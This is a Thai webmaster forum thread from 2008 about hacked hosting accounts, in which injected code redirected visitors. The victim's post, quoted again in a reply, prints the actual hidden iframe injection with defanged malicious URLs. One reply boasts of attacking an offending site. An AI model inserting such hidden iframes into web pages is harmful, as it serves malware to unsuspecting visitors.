ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comพัฒนาเว็บไซต์Programmingใครเก่งช่วยแนะนำหน่อยโดนแฮคเวบ
หน้า: [1]   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: ใครเก่งช่วยแนะนำหน่อยโดนแฮคเวบ  (อ่าน 1146 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
pimonrut
Newbie
*

พลังน้ำใจ: 0
ออฟไลน์ ออฟไลน์

กระทู้: 18



ดูรายละเอียด
« เมื่อ: 22 กุมภาพันธ์ 2008, 22:15:41 »

ใช้ hostmonster อยู่ มัน hack  เข้าไปแล้วแทรก code

 Angry<iframe src='hxxp://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;'></iframe>

เข้าไปทุก directory ที่มีไฟล์  index.php หรือ index.html

เวลาเปิดเวบมัน เปิดหน้านี้ขึ้นมาตลอด

hxxp://195.2.252.107/sp/file.php

เข้าไป remove แล้วเปลี่ยนรหัสผ่าน  วันนี้มาอีกแล้ว เหนื่อยมาก

บันทึกการเข้า
mejan
ก๊วนเสียว
*

พลังน้ำใจ: 0
ออฟไลน์ ออฟไลน์

กระทู้: 230



ดูรายละเอียด
« ตอบ #1 เมื่อ: 22 กุมภาพันธ์ 2008, 22:27:55 »

ผมเคยเจอผมลบทิ้ง แล้วหยุดไปเลย 1 อาทิตย์แล้ว up ใหม่
บันทึกการเข้า

EThaiZone
เจ้าพ่อโลลิค่อน
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 321
ออฟไลน์ ออฟไลน์

กระทู้: 12,518



ดูรายละเอียด เว็บไซต์
« ตอบ #2 เมื่อ: 22 กุมภาพันธ์ 2008, 22:45:45 »

สงสัย Cpanel โดนเล่นซะละมั้ง
hostgator ยังเคยโดนเลย

โค๊ด:
http://forums.hostgator.com/showthread.php?p=36448
บันทึกการเข้า

Finish
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 94
ออฟไลน์ ออฟไลน์

กระทู้: 1,451



ดูรายละเอียด เว็บไซต์
« ตอบ #3 เมื่อ: 22 กุมภาพันธ์ 2008, 22:51:20 »

ผมเคยเจอครับ

ทุกโฟลเดอร์ที่อยู่บนโฮส จะถูกแก้ไขไฟล์หมด
โดยมันจะแทรก Code แปลกๆ เข้ามาในเว็บ
บางครั้งไฟล์ Index หายไปโดยไร้ร่องรอย

ตอนแรกผมไม่รู้ว่าเป็นเพราะอะไร เจ้าของโฮสเขาแกล้งเราหรือเปล่า? หรือใครมาเจาะระบบของเรา?ฯลฯ

ผมจึงทำการย้ายโฮสใหม่ ปรากฎว่า Code ที่ว่านี้มันเป็นไวรัสครับ
มันจะเกาะทุกไฟล์ที่เป็น Index

วิธีการแก้ไขปัญหาคือ
ให้ลบไฟล์ที่ติดเชื้อให้หมดก่อน

จากนั้นทำการอัพโหลดไฟล์ Index ขึ้นไปใหม่
แต่ก่อนที่จะทำการอัพโหลดไฟล์
 
ให้ทำการตรวจเช็คก่อนว่า ไฟล์ในเครื่องของเราติดเชื่อหรือเปล่า
คือเข้าไปดูว่ามี Code แปลกๆ ใน Index

เมื่อแก้ไข หาแล้วไม่เจอ จึงทำการอัพโหลไฟล์ขึ้นไปใหม่
รับรองหายครับ

ผมเคยเจอมาก่อนครับ (โง่ไปย้ายโฮสใหม่ เนื่องจากไม่รู้ Cry)
แถมอีกนิดหนึ่งครับ  บางครั้งไฟล์ Index ของเราหายไปไหนก็ไม่รู้
เราอาจจะคิดว่า มีใครมาแฮกส์ หรือเจาะระบบเว็บไซต์ของเรา
แต่ปัญหานี้ เป็นไวรัสครับ

ไว้ว่างๆ จะมาเล่าให้ฟังใหม่(ถ้าอยากฟัง) Grin
บันทึกการเข้า

technomatch
บุคคลทั่วไป
« ตอบ #4 เมื่อ: 22 กุมภาพันธ์ 2008, 23:18:13 »

ใช้ hostmonster อยู่ มัน hack  เข้าไปแล้วแทรก code

 Angry<iframe src='hxxp://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;'></iframe>

เข้าไปทุก directory ที่มีไฟล์  index.php หรือ index.html

เวลาเปิดเวบมัน เปิดหน้านี้ขึ้นมาตลอด

hxxp://195.2.252.107/sp/file.php

เข้าไป remove แล้วเปลี่ยนรหัสผ่าน  วันนี้มาอีกแล้ว เหนื่อยมาก



อย่าลืมดูไฟล์ ที่มีคำว่า main ด้วยนะครับและก็ไฟล์ที่มีชื่อว่า index รวมอยู่ด้วยเช่น indextemplate , index2
ของผมโดนประมาณเดียวกัน
บันทึกการเข้า
mangda
Newbie
*

พลังน้ำใจ: 0
ออฟไลน์ ออฟไลน์

กระทู้: 70



ดูรายละเอียด
« ตอบ #5 เมื่อ: 22 กุมภาพันธ์ 2008, 23:41:19 »

ดรีมโฮสก็มาเยือนครับ  ผมเพิ่งโดนไปสดๆร้อนๆเลย
บันทึกการเข้า
pimonrut
Newbie
*

พลังน้ำใจ: 0
ออฟไลน์ ออฟไลน์

กระทู้: 18



ดูรายละเอียด
« ตอบ #6 เมื่อ: 23 กุมภาพันธ์ 2008, 00:27:00 »

ล่าสุดให้ host RollBack แล้วใช้งานไม่ได้หมดเลยเจ๊ง
บันทึกการเข้า
nopp
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 200
ออฟไลน์ ออฟไลน์

กระทู้: 1,252



ดูรายละเอียด
« ตอบ #7 เมื่อ: 23 กุมภาพันธ์ 2008, 08:10:24 »

ผมว่ามันโดนกันทุกโฮสนั้นละ ไม่มากก็น้อย แต่เราจะรู้หรือนั้นอะดิ ผมยังเคยเพราะผมทำเวบเยอะ นานๆ จะตามไปอัพเดทเวบเพิ่มเติม พอไปที่เวบเรา เวบไรขึ้นมาไม่รู้ ADS ทั้งนั้น ผมเลยส่งเรื่องร้องเรียนเข้าไปเลย แล้วผมยังยิงเวบมันกะจุยไปเลย อิอิสมน้ำหน้ามัน    ถ้าท่านเจอเวบมันนะ ที่มีโฆษณากูเกิ้ลด้วยละก้อ อย่าเพิ่งทำอะไรมันปล่อยมันไว้ก่อน แล้วท่านก็นี่เลย  ไม่เกิน 2 วัน Acc ADS มันหายแน่นอน อิอิ
โค๊ด:
http://www.google.com/contact/spamreport.html

ถ้าท่านเจอเวบสแปมต่างก็ร้องเรียนได้นะ จะได้ลดคู่แข่ง อิอิ  กูเกิ้ลกำลังตามล้างตามเช็ดอยู่ ซิบอกให้
บันทึกการเข้า
Thenetwork
คนรักเสียว
*

พลังน้ำใจ: 8
ออฟไลน์ ออฟไลน์

กระทู้: 113



ดูรายละเอียด
« ตอบ #8 เมื่อ: 23 กุมภาพันธ์ 2008, 20:46:56 »

เปลี่ยนโฮสไหม่ครับ..
บันทึกการเข้า

หน้า: [1]   ขึ้นบน
พิมพ์